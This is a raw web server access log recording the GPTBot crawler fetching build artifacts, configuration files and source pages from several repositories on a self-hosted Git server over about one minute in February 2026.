"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70803] [Gzip 17.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13193003] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192991] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99712] [Gzip 29.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38614] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38590] [Gzip 14.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909088] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:16:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10086] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49764] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49736] [Gzip 27.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:16:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython3.12" [Client 74.7.227.38] [Length 23625] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:16:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip3.12" [Client 74.7.227.38] [Length 24112] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:16:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:16:05:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 